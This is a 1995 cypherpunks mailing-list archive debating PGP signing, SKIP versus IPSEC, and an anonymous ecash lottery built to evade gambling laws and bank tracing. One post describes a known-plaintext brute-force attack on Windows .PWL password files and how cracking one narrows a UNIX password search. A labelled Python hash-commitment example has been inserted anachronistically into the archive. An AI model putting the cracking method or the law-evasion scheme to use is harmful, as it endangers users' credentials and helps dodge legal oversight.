Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@sunflash.eng.usf.edu>
Date: Thu, 30 Nov 1995 04:50:46 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: key for Alice as promised (not)
In-Reply-To: <m0tKrau-00090tC@pacifier.com>
Message-ID: <Pine.SUN.3.91.951129144031.25904B-100000@sunflash.eng.usf.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Wed, 29 Nov 1995, jim bell wrote:

> Wake up, idiot!  The purpose of encryption and signing and such is to REDUCE
> problems, ideally to zero but if not to some adequately small value.  To
> fail to use signing when there is no ongoing problem is risky; to not use
> signing when there is a  serious continuing problem is downright lunatic.
> That sets up an irresolvable contradiction:  On the one hand, you're willing
> to tolerate a continuing problem, yet on the other you claim that your
> standards are so high that you won't use a system unless the probability of
> security essentially precludes a loss of security.

  Unfortunately priorities are mixed up here.  Reputation should be more 
important, unless Alice is actually a group of teenagers that are just 
having fun at the list's expense, and could care less what they write as 
long as it gets a response.  If the writer actually cared about his 
reputation then a digital signature would be the best way to go, but a 
different encryption scheme should be used for the signature than the 
message.
  Just my $0.02, but if Alice continues to just not care about his 
reputation, and people can't verify that the same writer(s) wrote it, 
then maybe ignoring posts would be a good choice.
  Take care and have fun.

==========================================================================
James Black (Comp Sci/Comp Eng sophomore)
e-mail: black@eng.usf.edu
http://www.eng.usf.edu/~black/index.html
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 30 Nov 1995 05:00:07 +0800
To: Doug Hughes <Doug.Hughes@eng.auburn.edu>
Subject: Re: SKIP Source Release is out!
In-Reply-To: <doug-9510291935.AA029910760@netman.eng.auburn.edu>
Message-ID: <199511291947.OAA03516@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Doug Hughes writes:
> 'Tis a shame, because SKIP is available right now and will, if past history
> is any indication, become the de facto standard on Sun platforms because it
> is readily available,

I suspect that no one else will use it. Morningstar is already
shipping the ESP/AH stuff -- other router vendors are doubtless going
to be doing so soon as well. All other hardware manufacturers will be
running the normal IPSEC too. I suspect Sun is going to have a very
tough sell.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Thu, 30 Nov 1995 06:45:19 +0800
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: key for Alice as promised (not)
Message-ID: <m0tKuh9-0008zjC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Tue, 28 Nov 1995, Adam Hupp wrote:
>
>> >Can you imagine??  I'm simply not willing to fool myself into thinking 
>> >that I have security by posting a key and using PGP.
>> 
>> Unless you can post some proof that PGP is insecure, stop insisting it is.
>
>Hold on a minute.  Alice is, here, 100% correct.

No, he isn't.  He isn't even using a minimal effort to prevent spoofing, and
he's blaming this on the fact that some particular piece of software (for
example, PGP) isn't absolutely foolproof. 


>If I use PGP to read messages and there's a videocamera trained on the 
>keyboard, and other people have access to the machine, PGP is not 
>secure.  Similarly, if PGP is on a computer which other people may use 
>without my supervision, they can  monitor keystrokes, etc. and PGP is not 
>secure.

True but irrelevant.  This is especially true since the only purpose to
signing messages to a public area is to prevent spoofing.  If somebody does,
indeed, figure out how to break (say) a 1024-bit PGP key and "Alice" gets
spoofed, HE WILL KNOW because he will see a message with his signature that
HE KNOWS he didn't send.  At that point, he will at least be able to reduce
the number of spoofed messages to 1 before he alerts us that there is a
problem.  We won't necessarily know who to believe, of course, but we will
know that one of a number of things is probably true:

1.  "Alice" is lying to us.   (by far the most likely.)

2.  Somebody actually has physical access to "Alice's" machine and is
actively using it to spoof messages.

3.  Somebody found out how to break 1024-bit PGP keys easily.  (Very
unlikely, of course.)
 

>A chain is only as strong as its weakest link; Alice recognizes this, and 
>makes no claim that PGP itself is the weak link. 

But "Alice" resists using ANY chain at all!

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Thu, 30 Nov 1995 00:38:57 +0800
To: Patiwat Panurach <pati@ipied.tu.ac.th>
Subject: Re: The future will be easy to use (fwd)
Message-ID: <Pine.3.89.9511291640.A7225-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 28 Nov 1995, Patiwat Panurach wrote:

> I feel sad when they say that the market for <1000 $ machines is nil, I 
> had so much fun and learned so much from my old machines.

Personally, I just bought a 486/66 laptop, which would have cost almost 
$1000 with 170 MB hard disk, 4 MB of RAM and Linux (I paid a couple of
hundred extra for a 500 MB disk)... I could have got a Pentium desktop
for the same price if I'd wanted one. So I don't see that there's really a
great advantage to a $ 500 diskless computer (and having worked on Sun
3/50s in the past, I know about all the disadvantages). 

ObCrypto/Security: My landlord bought himself a computer a couple of weeks
ago after he'd lived without them for over forty years, and has been
enthusing about how easy it makes it for him to do his accounts. He just
read about these diskless machines in a magazine, and his first reaction
was that there was no way he'd keep his accounts information on a remote
server. Obviously people *are* more privacy-aware than they're often given
credit for. 

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fluffy@shout.net (Chris Stillson)
Date: Thu, 30 Nov 1995 06:56:03 +0800
To: "C'Punks" <cypherpunks@toad.com>
Subject: Re: GOST for sale
Message-ID: <199511292216.QAA25781@duracef.shout.net>
MIME-Version: 1.0
Content-Type: text/plain


What I wonder about is why anyone would use the Algorithm
that the NSA is probably best at breaking.  Breaking GOST was probably
their number one project for years, and I would suspect that they
have done it.

chris






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 30 Nov 1995 05:53:39 +0800
To: attila <attila@primenet.com>
Subject: Re: The future will be easy to use
In-Reply-To: <Pine.BSD.3.91.951129205059.29011B-100000@usr2.primenet.com>
Message-ID: <199511292128.QAA03706@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



attila writes:
>     figures. I'll give ipsec and ipsec-dev a look.  However, SUN does have
> the power to make something happen on the high-power workstations, and the
> fact they are making a portable package available in source code is
> farther than anyone else has gone. 

Unfortunately, an internetworking protocol used by only one vendor
gets nowhere.

>     my experience over the last 15 years with Sun is that they do listen 
> to outside "noise" and will move forward.

I doubt it. Ashar Aziz and company at Sun are pretty much
ego-committed to SKIP. Their group might not have nearly as much
justification for its existence without it. That probably makes them
reluctant to go in the right direction.

>    other than the inferior method v. DH, is there anything else missing; 
> I will probably pull the code package of the developers' access machine 
> before the week is out just to take a look.

SKIP is really very alien from the direction most of IPSEC is
taking. It sacrifices a lot of functionality for the perceived benefit
of being able to send an encrypted packet to a host "without prior
negotiation". Unfortunately, that benefit turns out to be a mirage
because in any real network you would need to do a certificate lookup
in order to actually decrypt the packet, at which point you've lost
any advantage. SKIP requires all sorts of hooks into the ESP/AH packet
formats which makes it essentially incompatible with ESP/AH
implementations. SKIP uses long term keys which could really hurt if
they were compromised. SKIP doesn't do perfect forward secrecy. I
could go on and on.

Ashar keeps answering every criticism with "well, you COULD do X in
SKIP if you just hung this kludge onto it, but of course we hope most
people would never do that".

I started with a lot of respect for the guys and lost most of it
through time. Ah, well.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: J Lavelle <jlavelle@mpx.com.au>
Date: Wed, 29 Nov 1995 14:37:02 +0800
To: cypherpunks@toad.com
Subject: mailing list
Message-ID: <m0tKfsB-0006LNC@kyoko.mpx.com.au>
MIME-Version: 1.0
Content-Type: text/plain


can you put me down on the list, as i have a keen interest in the 
subject.
           Thanx.....






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Thu, 30 Nov 1995 19:55:02 +0800
To: cypherpunks@toad.com
Subject: Re: Microsoft weak encryption
In-Reply-To: <199511291447.GAA19250@mail.eskimo.com>
Message-ID: <30BC95AB.211E@nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Joel McNamara wrote:

> Peter Gutmann has an interesting article in sci.crypt, demonstrating how
> weak Microsoft's encryption is with basic access control in Windows for
> Workgroups (I'm assuming Win95 uses the same algorithm).  Essentially, he
> shows how a 32-bit key is created to be passed to RC4 for encrypting .PWL
> files.  I think a t-shirt is definitely in order for this.

Further information on the method used by Windows NT (a challenge-response
mechanism) can be found on the MSDN CD, or on the MS ftp site:
PSS ID Number: Q102716.  I'll mail the article to anyone that wants to see
it (~11k).


- Andy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Thu, 30 Nov 1995 07:16:21 +0800
To: "cypherpunks@toad.com>
Subject: "Proprietary" internetworking protocols (was RE: The future will be easy to use )
Message-ID: <01BABE83.A3A80240@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger writes:
>attila writes:
>>figures. I'll give ipsec and ipsec-dev a look.  However, SUN does have
>>the power to make something happen on the high-power workstations, and the
>>fact they are making a portable package available in source code is
>>farther than anyone else has gone. 
>
>Unfortunately, an internetworking protocol used by only one vendor
>gets nowhere.

much other discussion omitted...

I hate to quibble, but past experience may demonstrate this
to be inaccurate.  In particular, and most relevantly:

	NFS (Sun)
	SSL (Netscape)

Another internetworking protocol (IPX) gave Novell a good run.

The point is that a working implementation goes a long way for
people who want/need _something_ that works, NOW. Consider the
relative merits/success of S-HTTP and SSL.

ObCrypto: the POTP people are at the Boston Internet Expo today and
tomorrow, and they have their "technical guy" who is supposed
to be answering questions. The nontechnical guy said they generate
random numbers using randomness taken from the text of the messages
being encrypted.

-pl
_Electronic Commerce_ (Charles River Media, available now)
pete@loshin.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 30 Nov 1995 11:01:06 +0800
To: cypherpunks@toad.com
Subject: Re: key for Alice as promised (not)
Message-ID: <199511300232.SAA22068@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 29 Nov 1995, Adam Shostack wrote:

> > PGP is really not the issue.  The issue is more my security and the
> > environment that I use PGP in.  I don't have a trusted machine to run PGP
> > on.  Anyone who wants to can come up to machine and copy my secret keyring
> > or they can even watch me typing my password in. 
> 
> 	Threat, please??  Do people often stand over your shoulder as
> you type?

Yes.

>  Enter your office, 

Yep, especially my night cleaning staff.

> point guns at you, 

Not recently ... I'd co-operate fully in that situation, though.

> and take a backup of your entire computer?  

You mean like the on-site backups that I have in the filing cabinet 
beside me, or the off-site backups that aren't here (in case of fire, or 
such) and are completely outside my control?

> Have you considered putting the secret keyring
> on a floppy and locking it in your desk/safe when you're not actually
> in the office? (Or home..)

Yep, I've considered it.  It's still not all that helpful.  Cleaning 
staff has plenty of time when I'm not around to deal with that.

> > So, I don't fool myself, and I don't use PGP, except for things like
> > exchanging a one-time pad with someone when I've already sent the message
> > out across another delivery mechanism, like on a floppy delivered by
> > courier. 
> 
> 	I don't follow.  You're claiming that PGP is good enough to
> transfer OTPads, but not good enough to sign pseudononymous messages?

Sure. Two different situations.

If I take a message or a data tape and encrypt it with a one time pad.  

And then I send the message out to someone via Greyhound or DHL.

And once they've confirmed that they have the encrypted message safely in 
hand, then I'll call them and ask them to call me with their public key
delivered by voice via telephone.

Which I then use to encrypt the one-time-pad, using the PGP key only once.

Then, I'm comfortable sending it (not the message, but the pad) over the 
Internet encrypted with PGP.  And I think at that point, I have Pretty 
Good Privacy.

> Adam
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 30 Nov 1995 07:59:49 +0800
To: perry@piermont.com
Subject: Re: The future will be easy to use
Message-ID: <01HY84MS8LTC8WYXJI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"perry@piermont.com" 28-NOV-1995 13:34:33.55

Jonathan Zamick writes:
> I can't agree. The model of a successful enterprise includes feedback from
> different levels of participants.

This isn't an enterprise. The government is not a participant except
by their own desire to interfere.
---------
	One reason to incorporate a probable opponent into something is to see
what methods the opponent will likely use. For instance, their debating points
would be nice to know in advance (to the degree they aren't already); while
cyberpunks don't have much access to the mass media, that on the Net
(where a lot of the initial potential users are likely to be) is another
matter. Getting clues to their likely legal strategy may also be valuable.
	On the other hand, letting them know too much may be a problem... of
course, I'm _certain_ the NSA, etcetera get copies of this list.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 30 Nov 1995 08:16:29 +0800
To: tcmay@got.net
Subject: Re: Directed Hamiltonian Path Problem
Message-ID: <01HY84U9MG468WYXJI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 28-NOV-1995 20:15:30.64

The reason we speak in terms of physical volumes of "Adleman computers" is
to make concrete the way things scale. If the amount of Adleman computers
needed to factor, say, a 2000-digit modulus (or some reasonably equivalent
Hamiltonian cycle problem, such as the TSP) is "ten Pacific oceans full of
them running for 100 years," then one has a pretty clear feel for just how
futile it is to ask about "But what about if we apply MASSIVE
PARALLELISM?!?!"
------------
	Ah. My objection is probably from being too much of a purist in my own
area of science. I do tend to try to be quite careful in whatever I write to
use the correct terms (then explain them for those who've heard the incorrect
ones).

-------------
I don't worry much about factoring breakthroughs. And I don't mean minor
improvements, which keep occurring: I mean major breakthroughs which would
make factoring a 2000-decimal-digit number "easy."

Practically speaking, snarfing private keys is a helluva lot easier, for
many reasons.
--------------
	Umm... it's easier for each one. But the effort in question adds up.
Ultimately, for an agency (NSA, CIA, etcetera) wanting to do a lot of such
unencryptings, coming up with a factoring method is the most efficient way to
go. Fortunately, science doesn't work very well with security classifications
(unlike engineering, which is what most military classified "science" is from
what I know).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 1 Dec 1995 16:12:31 +0800
To: iang@cs.berkeley.edu
Subject: Re: ecash lottery (Was: ecash casino)
In-Reply-To: <49j0sq$a69@calum.csclub.uwaterloo.ca>
Message-ID: <199511300250.SAA07657@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> So; is there a problem with the implementation outlined above?  If it were
> implemented, would people play it?
> 

	I think it would be easier if the lottery owner was just in a
safe jurisdiction. Then he wouldn't have to worry about the legality
of it, and not worry about his anonymity. Gambling-safe jurisdictions
*do* exist.
	There lies a problem if *playing* a game is illegal in the US,
which I believe it may be. If the winners can be revealed by
bank/lottery collusion, then in order to protect the winners the
lottery can't collude with the bank. This may not be a problem,
because the lottery isn't subject to US law, so there would be no way
to force the lottery to collude with the bank to reveal the
identities of the winners.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 30 Nov 1995 08:38:24 +0800
To: cypherpunks@toad.com
Subject: Re: ecash protocol: Part 1
In-Reply-To: <199511212146.NAA11456@cory.EECS.Berkeley.EDU>
Message-ID: <49it0e$r4i@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511212146.NAA11456@cory.EECS.Berkeley.EDU>,
Ian Goldberg  <iang@cory.EECS.Berkeley.EDU> wrote:
>I've managed to decipher a useful bit of the first message sent from
>the shop to the payer.  It's the Payment Request, and contains the following
>information:
>
>o Header identifying packet as Payment Request
>o The integer 4
>o The payment amount, in cents
>o The time (seconds since 1970)
>o The integer 79
>o The name of the shop (payee)
>o A description of the item being paid for
>o An empty string
>o The integer 0
>o End of Record marker
>
>I don't know what the 4, 79, empty string, and 0 are for.  I assume one
>of them (probably the 4) is some indication of currency (US cents).

I now know what the empty string and the 0 are for.  In the event that
a Payment Request is sent out-of-band (in an application/ecash message,
for example), the string and integer are the hostname and port (commonly
1100) to which the payer should connect in order to send a payment.

   - Ian "Wait for it..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 30 Nov 1995 16:44:29 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: ecash lottery (Was: ecash casino)
In-Reply-To: <ace2609d04021004758e@[205.199.118.202]>
Message-ID: <199511300324.TAA11412@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Personally, I have long had great _hopes_ for using crypto for
> non-sanctioned gambling, but I'm pretty skeptical that many people will do
> it. For one thing, anyone knowledgeable enough to be comfortable with the
> cryptography knows that gambling when a house cut exists is a lose. (And
> gambling with no house cut is, at best, a wash.)
> 

	"anyone knowledgeable enough to be comfortable with the
cryptography knows that gambling when a house cut exists is a lose."

	These people would not be the target market.

	My figuring is that the target market for lotteries would be
your average joe home web browser, and your gambling addicts, of
course. These people would not be comfortable with encrypted open
books, but I don't think that encrypted open books is really necessary
to run a lottery which provably doesn't cheat. (Perhaps not
*provably*, but reliably enough that people will play... )
	High stakes lotteries may not be suitable but a slot-machine
low-stakes system with perhaps a $1/play and a 40% chance of winning
*something* (maybe not the full $1.00) could satisfy people enough
that they will keep playing, and tell their friends about it. The
target market here is by no means people who understand that house cut
gambling is a lose.
	The reason to have an ecash casino/lottery is two-fold: A)
Make ecash take off. B) Make lots of money.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Andrew Stevenson <frank@funcom.no>
Date: Thu, 30 Nov 1995 03:47:42 +0800
To: Joel McNamara <joelm@eskimo.com>
Subject: Re: Microsoft weak encryption
In-Reply-To: <199511291447.GAA19250@mail.eskimo.com>
Message-ID: <Pine.SGI.3.91.951129200230.29189B-100000@odin>
MIME-Version: 1.0
Content-Type: text/plain



I have been able to verify the key generation for the
.pwl file, and successfully decrypted one; the contents
are really suited for a known plaintext attack as the
first characters appear to be the USERNAME in capitals
padded with 0x00 to a total field size of 20,
I have written software to bruteforce this field, but without
optimizing I have a running time of 130 hours (Pentium 66)

An interesting observation: If the password is shared with a UNIX
fileserver (8 letters) once the 32 bit RC4 key is found guessing the
last 4 letters of the password will reveal the remaining letters.
This will then greatly reduce the keyspace needed to crack the UNIX
password (you need to guess the case of the password though - (2^8) )  

> Peter Gutmann has an interesting article in sci.crypt, demonstrating how
> weak Microsoft's encryption is with basic access control in Windows for
> Workgroups (I'm assuming Win95 uses the same algorithm).  Essentially, he
> shows how a 32-bit key is created to be passed to RC4 for encrypting .PWL
> files.  I think a t-shirt is definitely in order for this.
> 
> Anyone up for writing some bruting code?
> 
> Joel
> 

#include <std/disclaimer.h> 
E3D2BCADBEF8C82F A5891D2B6730EA1B PGPencrypted mail preferred, finger for key






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 30 Nov 1995 09:46:39 +0800
To: cypherpunks@toad.com
Subject: ecash lottery (Was: ecash casino)
In-Reply-To: <199511291640.IAA28114@infinity.c2.org>
Message-ID: <49j0sq$a69@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511291640.IAA28114@infinity.c2.org>,
sameer  <sameer@c2.org> wrote:
>	Any enterprising cypherpunks in gambling-friendly
>jurisdictions interested? I figure it would make ecash take off.. and
>you'd get rich.
>
Does anyone know what jurisdictions allow lotteries/gambling?

Here's an off-the-cuff idea:

[Disclaimer: The following post is a gedanken experiment.  It should not
		be interpreted as condoning or encouraging anyone to break any
		laws, no matter how stupid the laws are.]

Anonymous email lotteries:
Advertise the lottery (and include a public PGP key) through some remailer
in one of the above jurisdictions.  Use a remailer that allows pseudonymous
replies.  In the announcement, include a secure hash of the next drawing's
winning number (appended to appropriate amounts of random noise).  Advertise
to a mailing list or a newsgroup, like alt.anonymous.lotteries.announce.

People pay by sending:
{
A payment made out to "@" (the ecash wildcard)
Their choice of lottery ticket number
A PGP Public key
}
encrypted with the lottery's public key, to the remailer address.

A lottery consists simply of displaying the winning number and random
noise, whose hash was previously posted (so the participants know
you're not cheating).

Now: there's likely no Web-of-Trust to the various PGP keys involved,
so the lottery's Reputation will have to be built up.  A good way to
do this is to have smaller prizes being won fairly often (e.g. by matching
the last digit/few bits), so that it's obvious the lottery is not just
collecting money without awarding prizes.

The lottery pays out by replying to the winner's pseudonymous messages
with their payment (made out to "@"), encrypted with their PGP key.

There can be other variants on the lottery.  For example, the participant
whose ticket is _closest_ to the winning number wins all the money
in the pot (minus a cut for the house).  A problem with this, and various
other forms of the lottery, is that it's hard for the lottery to prove
that it's not cheating (either in the amount of money it took in, or
that the losers of the lottery actually lost, etc.).

In this model of payment, no participant knows anything about any other
participant except a remailer's Reply-Block, and a PGP public key.
However, using the features of ecash (from what I know of how it works,
which isn't all that much (yet)), a payer can, in collaboration with the
bank, identify the payee.  This may be undesirable for the lottery operator
and/or the participants.

If (when) details of ecash are published (by Digicash or by someone else),
it would likely be easier to work out how to achieve all-way anonymity with
ecash.  I seem to recall some mention of how this would be done here
a while ago, and Lucky said he was going (before he started working for
them) "to write some scripts that will lay the groundwork for some of the
more unusual applications of Ecash".

Follow-up thought:
The lottery operator, instead of depositing the coins he receives
from the participants, stockpiles them, and forwards them on to the
winner(s).  If a participant complains to the bank, and the bank traces
his payment, it is likely to merely identify another participant
(who is not doing anything illegal, AFAIK (IANAL; it's illegal to _run_
this sort of thing inside the US, not to _play_ it, right?)), and the
lottery owner can even claim he is merely a participant, in the chance event
that he _is_ the one identified, and he happens to be in the US...

As far as I can tell, then, with this sort of method, the only way the
lottery operator could be caught (technically; he could be caught in
non-technical ways, say by being overheard bragging about it (Don't laugh;
it's been done.)) is by having the remailer (or remailer chain) compromised.

So; is there a problem with the implementation outlined above?  If it were
implemented, would people play it?

   - Ian "Still not sure he wants to get an ecash account"
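
[Added example, not part of Ian Goldberg's post: the announce-then-reveal step of the lottery described above, written as a hash commitment. SHA-256 stands in for the unspecified "secure hash"; the six-digit ticket size, the 32-byte noise, the "|" separator and every function name are assumptions made for this illustration.]

```python
import hashlib
import hmac
import secrets

DIGITS = 6         # assumed ticket size: numbers 000000..999999
NOISE_BYTES = 32   # assumed size of the "random noise" in the announcement


def _encode(winning_number, noise):
    """Fixed-width winning number appended to the noise (unambiguous encoding)."""
    if not 0 <= winning_number < 10 ** DIGITS:
        raise ValueError("winning number out of range")
    return noise + b"|" + str(winning_number).zfill(DIGITS).encode("ascii")


def commit(winning_number, noise=None):
    """Operator, before the draw: return (hash to publish, noise to keep secret)."""
    if noise is None:
        noise = secrets.token_bytes(NOISE_BYTES)
    digest = hashlib.sha256(_encode(winning_number, noise)).hexdigest()
    return digest, noise


def verify_reveal(announced_hash, winning_number, noise):
    """Participant, after the draw: does the reveal match the announcement?"""
    if len(noise) < NOISE_BYTES:
        # Too little noise means the number was guessable before the draw,
        # so the announcement never hid anything. Reject the reveal.
        return False
    try:
        recomputed = hashlib.sha256(_encode(winning_number, noise)).hexdigest()
    except ValueError:
        return False
    return hmac.compare_digest(recomputed, announced_hash.lower())


def guess_from_hash(announced_hash, noise=b""):
    """Why the noise matters: if the noise is empty or known, the whole
    ticket space can be hashed and compared against the announcement."""
    for n in range(10 ** DIGITS):
        if hashlib.sha256(_encode(n, noise)).hexdigest() == announced_hash:
            return n
    return None


def matching_suffix(ticket, winning_number):
    """Trailing digits shared with the winning number (the small-prize tiers)."""
    a = str(ticket).zfill(DIGITS)
    b = str(winning_number).zfill(DIGITS)
    count = 0
    for x, y in zip(reversed(a), reversed(b)):
        if x != y:
            break
        count += 1
    return count


if __name__ == "__main__":
    # Constructed sample draw.
    announced, secret_noise = commit(123456)
    print("announce :", announced)
    print("reveal ok:", verify_reveal(announced, 123456, secret_noise))
    print("swapped  :", verify_reveal(announced, 654321, secret_noise))
    print("ticket 993456 matches", matching_suffix(993456, 123456), "digits")

    # Same number committed with no noise: recoverable from the hash alone.
    weak, _ = commit(4711, noise=b"")
    print("no-noise announcement leaks:", guess_from_hash(weak))
```

The commitment binds the operator to one winning number; it does nothing about the other problems raised in the post, such as proving how much money came in or that winners were paid.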




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 30 Nov 1995 12:01:20 +0800
To: cypherpunks@toad.com
Subject: Re: ecash lottery (Was: ecash casino)
Message-ID: <ace2609d04021004758e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:20 AM 11/30/95, Ian Goldberg wrote:

>[Disclaimer: The following post is a gedanken experiment.  It should not
>                be interpreted as condoning or encouraging anyone to break any
>                laws, no matter how stupid the laws are.]

I, on the other hand, have no compunctions about "condoning or encouraging"
various kinds of actions. When condoning and encouraging becomes criminal,
I hope I'll be gone. (Wiseacres will cite hypos in which encouraging a
crime, such as a rape, makes the encouragers culpable. A far cry from
condoning and encouraging tax evasion, gambling, etc.)

On to Ian's proposal:

...
>Now: there's likely no Web-of-Trust to the various PGP keys involved,
>so the lottery's Reputation will have to be built up.  A good way to
>do this is to have smaller prizes being won fairly often (e.g. by matching
>the last digit/few bits), so that it's obvious the lottery is not just
>collecting money without awarding prizes.

Have to be _very_ careful here. A variety of scams can be developed which
show lots of "small" winners, but which fail to show any large winners. The
lottery operators can make a lot of extra bucks by simply not paying off
the large winnings, in various ways.

More robust protocols may be possible. In particular, I recall that Eric
Hughes was working on something he called "encrypted open books." While
banking was the obvious domain, it seems plausible that the same
methodologies could be adapted for lotteries (some isomorphisms between
accounts/balances and tickets/winnings?).

I don't follow Ian's proposal in enough detail to comment on it, but
thought I should point out the scams over nonpayment of winnings and the
"encrypted open books" notions (from sometime in '93, as I recall).

Personally, I have long had great _hopes_ for using crypto for
non-sanctioned gambling, but I'm pretty skeptical that many people will do
it. For one thing, anyone knowledgeable enough to be comfortable with the
cryptography knows that gambling when a house cut exists is a lose. (And
gambling with no house cut is, at best, a wash.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hroller Anonymous Remailer <hroller@c2.org>
Date: Thu, 30 Nov 1995 13:17:05 +0800
To: cypherpunks@toad.com
Subject: Your faith is PGP is charming and quaint, but wrong
Message-ID: <199511300446.UAA19851@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



All of these articles from people claiming to be me!

I repeat, for the slow learners, that I consider PGP to be untrustworthy, at least on my machines. I don't want those Mounties to do to me what they did to Mulroney en passant. 

You in the southern colony are free to use PGP, but I prefer other means of establishing my uniqueness. Style, for example, cannot be easily copied.

I am, as always, 


  Alice de 'nonymous ...
  
                                    ...just another one of those...
  
  
  P.S.  This post is in the public domain.

                    I.  A.  M.  A.  M.  O.  R.  O.  N.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 1 Dec 1995 16:10:45 +0800
To: cypherpunks@toad.com
Subject: Re: ecash lottery (Was: ecash casino)
In-Reply-To: <49j0sq$a69@calum.csclub.uwaterloo.ca>
Message-ID: <qqwcFD25w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


iagoldbe@csclub.uwaterloo.ca (Ian Goldberg) writes:
> So; is there a problem with the implementation outlined above?

What about the income tax on winnings?

>                                                                 If it were
> implemented, would people play it?

I probably would, if I get off my lazy ass to get an ecash account. :)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 30 Nov 1995 05:33:01 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: The future will be easy to use
In-Reply-To: <199511291555.KAA02851@jekyll.piermont.com>
Message-ID: <Pine.BSD.3.91.951129205059.29011B-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 29 Nov 1995, Perry E. Metzger wrote:

> 
> attila writes:
> > 
> >    what about the Sun release announced today? --it is fully functional
> > with DES and 3xDES, DH negotiation, etc. and is coded for either sun 4.1.3
> > or gcc compilers?  Check out http://skip.incog.com.  source to the SKIP
> > key management and IP layer encryption package for SunOs 4.x. 
> 
> Ah, yes. The non-standard from Sun.
> 
> It doesn't do D-H negotiation, by the way. It uses something I'd call
> inferior. Read the flames in ipsec and ipsec-dev for details.
> 
> .pm
> 
    figures. I'll give ipsec and ipsec-dev a look.  However, SUN does have
the power to make something happen on the high-power workstations, and the
fact they are making a portable package available in source code is
farther than anyone else has gone. 
